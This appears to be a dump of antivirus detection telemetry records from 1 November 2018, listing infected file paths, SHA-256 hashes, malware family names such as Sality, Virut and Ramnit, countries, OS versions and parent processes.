  Row(detection=Row(filename='axcrypt2go.exe', filepath='C:\\Program Files\\Axantum\\AxCrypt\\AxCrypt2Go.exe', filesize=568000, name='W32/Sality.AT.#M1.#R1'), hash='2011ec1b6eef77dfcc59f477f71d3b48d78d1695c41fc6c6222ec259b8f7582b', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:26:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\20D8EEE609BD1C6053B4D278F95AECEFBA2B7210BC971F0AE513ED2E0C644479', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:23:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:05:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:38:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='20fbb335951938f7fb69a4e1e6837a044b085ec9426b2f75bd532b16f80a4ed0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\20FBB335951938F7FB69A4E1E6837A044B085EC9426B2F75BD532B16F80A4ED0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='20fbb335951938f7fb69a4e1e6837a044b085ec9426b2f75bd532b16f80a4ed0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T09:02:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='photoshop_lessons.exe', filepath='H:\\ORG\\برامج\\photoshop_lessons.exe', filesize=1024000, name='W32/Virut.Gen.#M1.#R1'), hash='2143d4d48849cbb2a73eebc6bfb51c426486b6313b41d5525c5d92f01944b69f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='photoshop_lessons.exe', filepath='H:\\ORG\\برامج\\photoshop_lessons.exe', filesize=1024000, name='W32/Virut.Gen.#M1.#R1'), hash='2143d4d48849cbb2a73eebc6bfb51c426486b6313b41d5525c5d92f01944b69f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wwwords.exe', filepath='F:\\ACER SUKABIRUS\\Dra.NETI\\analisis\\flasdic\\GameHouse\\WildWords\\wwwords.exe', filesize=384000, name='W32/Chir.B.#M1.#R1'), hash='215e7325922382514fdc436d5b873058c751842a0812528cfd0e4f0cfb25748f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T17:52:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='personal information (2) (2) (2) (2).exe', filepath='I:\\Personal information (2) (2) (2) (2).exe', filesize=512000, name='TR/Drop.Agent.bjxj.#M1.#R1'), hash='21d709b0593c19ad2798903ae02de7ecdbf8033b3e791b70d7595bca64b99721', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T12:20:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7867A1B7-AB4F-4FAF-8BE8-E64B0D8AA5B0}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='21e07b31f103951d4648e184e7fbb717f1f0d6d41d7e45fb361438819bc14bb3', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:49:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:49:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:49:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:49:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winampa.exe', filepath='C:\\Program Files\\Winamp\\winampa.exe', filesize=128000, name='W32/Sality.AW.#M1.#R1'), hash='22ba6370f761c9dd8341f7075c959892d3aaa3822856d1b18b142121c2f72ee8', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T05:41:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='\\\\?\\F:\\Autocad2008\\x64\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='233646a02fd077be29f9ae0e6674fc2a0071da1a19aa29d7b08305eeda231295', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:17:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='repbrows.exe', filepath='D:\\Master\\Visual Basic\\OS\\MSAPPS\\REPOSTRY\\REPBROWS.EXE', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='233663964a4c9e01582817103c0be5f1f73a1730bd9b673d4eafe0eae08acb09', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-01T04:14:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='236d7f7aa7b3736f4871db14eafca24be9ee89b99c778ea248cb61f209fb370a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\236D7F7AA7B3736F4871DB14EAFCA24BE9EE89B99C778EA248CB61F209FB370A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='236d7f7aa7b3736f4871db14eafca24be9ee89b99c778ea248cb61f209fb370a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:13:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='K:\\TAB\\Lenovo_A536\\Working\\Lenovo_A536_S186_150813_ROW_(by_firmwarefile.com)\\Lenovo_A536_S186_150813_ROW\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='2387bab6aca052ea4474c91d80d3c2cdd44ad807d2576fc0c85ab63a2da207f2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:31:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='243d549bc467c61e89f7fb4ddd8fda7bf51413cdf787aeac563b414f57caa2cf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\243D549BC467C61E89F7FB4DDD8FDA7BF51413CDF787AEAC563B414F57CAA2CF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='243d549bc467c61e89f7fb4ddd8fda7bf51413cdf787aeac563b414f57caa2cf', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:58:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092120-632938ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8195652d\\AVSCAN-20181101-092016-578EC4FE\\AVSCAN-20181101-092120-632938EA', filesize=64000, name='Worm/Gamarue.ioemn.#M1.#R1'), hash='246654141534b0a4c14da86ea09218d0d9b151429341dfca15f4594b9243fc7d', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:21:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='24823227c06542fdd33ad2b6ad70ecd36eb952dbae9641adb50649a3c3239e6c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\24823227C06542FDD33AD2B6AD70ECD36EB952DBAE9641ADB50649A3C3239E6C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='24823227c06542fdd33ad2b6ad70ecd36eb952dbae9641adb50649a3c3239e6c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:50:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\24DABBE3279F895D09D49475F6A79EB854ECC6C488038E22A9B5171DD4D069AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:23:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kh dau tranh ca.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\KH Dau tranh CA.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='25082dc46ff2ad9c2ce9b262ffbafd1b92f201df475cf0e6e88ed9e7df7a2607', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:30:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kh dau tranh ca.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\KH Dau tranh CA.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='25082dc46ff2ad9c2ce9b262ffbafd1b92f201df475cf0e6e88ed9e7df7a2607', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:30:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161215-d82241f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161215-D82241F6', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='25082dc46ff2ad9c2ce9b262ffbafd1b92f201df475cf0e6e88ed9e7df7a2607', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:12:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='25479f7609ca14a234a8a6af4dcfb50d91b203ba239d928aa677cb57bd8424be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\25479F7609CA14A234A8A6AF4DCFB50D91B203BA239D928AA677CB57BD8424BE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='25479f7609ca14a234a8a6af4dcfb50d91b203ba239d928aa677cb57bd8424be', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T09:43:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='F:\\FILES 1\\Lenovo_K10a40\\Lenovo_K10a40_S230_MT6735_20170517\\K10a40_S230_MT6735_20170517\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='257c066aa01d49a5831255dd853cdd0d0a24b4c08c3f5a3dc7eb5208bffc77a5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T10:24:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered donad', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered donad', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='25d15dfae56e82fc98d308f15accee6c3d6dbc5e04c9a7dab5fa50c57e75ded5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:40:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deldrv.exe', filepath='E:\\Daiver Printer\\Canon MX328\\win\\Driver\\x86\\DrvSetup\\DelDrv.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='260b013f56ba4a552733789e20fd593da270bfac8b59df2d9617e55d6aed8965', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T11:17:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deldrv.exe', filepath='\\\\?\\E:\\Daiver Printer\\Canon MX328\\win\\Driver\\x86\\DrvSetup\\DelDrv.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='260b013f56ba4a552733789e20fd593da270bfac8b59df2d9617e55d6aed8965', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:36:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aladdin.exe', filepath='\\?\\J:\\العاب2\\علاءالدين\\Aladdin.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='26174cd8a598080bc31ba906063d8534dd5dce261930b97614d1d3b50f627b6a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:13:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iexplore.exe', filepath='D:\\Backup\\Windows\\system32\\dllcache\\iexplore.exe', filesize=860000, name='W32/Sality.AT.#M1.#R1'), hash='2640e0da790df7b5d8227b5605dd12de5f0f1c8830c57bd0c9cbcd957a67278f', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:08:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='26816da087efbf97adfcb5b42a635419892d958afcbc999b4da7e951389884ed', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gupdate.exe', filepath='H:\\DATA LAMA\\korespondensi ( D )\\d3bdbc504b5f33660aae92eb\\update\\gupdate.exe', filesize=716000, name='TR/Patched.Gen.#M300.#R3211'), hash='268ef5effb367847c104236af136319bc3bd7b35312acf198aace4a15d0a8798', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\Ground.exe', parentsize=534016, timestamp='2018-11-01T23:15:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spinstall.exe', filepath='G:\\SPDMTK FILES\\Lenovo\\Lenovo_A606_S039_150604_ROW_(by_firmwarefile.com)\\Lenovo_A606_S039_150604_ROW\\Driver\\Auto Installer Driver v1.1236.00\\SmartPhoneDriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AG.#M1.#R1'), hash='26a1024a60ce7cd98daedd9eb498992487bb68d14863353108f6eded6ad73c7a', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-01T03:50:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spinstall.exe', filepath='G:\\SPDMTK FILES\\Lenovo\\Lenovo_A606_S039_150604_ROW_(by_firmwarefile.com)\\Lenovo_A606_S039_150604_ROW\\Driver\\Auto Installer Driver v1.1236.00\\SmartPhoneDriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AG.#M1.#R1'), hash='26a1024a60ce7cd98daedd9eb498992487bb68d14863353108f6eded6ad73c7a', metadata=Row(cmdline='\\\\\\/onboot', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WWW.HOSTJSC.NET\\Internet Download Manager\\IDMan.exe', parentsize=990720, timestamp='2018-11-01T03:50:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oldfunk.exe', filepath='D:\\OLDFUNK.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cd worship.exe', filepath='\\\\?\\D:\\CD Worship\\CD Worship.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:38:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dance.exe', filepath='\\\\?\\D:\\Dance.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:38:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav3.exe', filepath='D:\\Fav3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T12:26:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav3.exe', filepath='D:\\Fav3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hiplifes cool.exe', filepath='D:\\Hiplifes Cool.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T12:26:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cd worship.exe', filepath='D:\\CD Worship.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dance.exe', filepath='D:\\Dance.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='live band.exe', filepath='D:\\LIVE BAND.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='D:\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T12:26:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cd worship.exe', filepath='D:\\CD Worship.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav.exe', filepath='D:\\Fav.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T12:26:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='live band.exe', filepath='D:\\LIVE BAND.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kuuls.exe', filepath='D:\\KUULS.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T12:26:29Z'), dt=datetime.date(2018, 11, 1)),
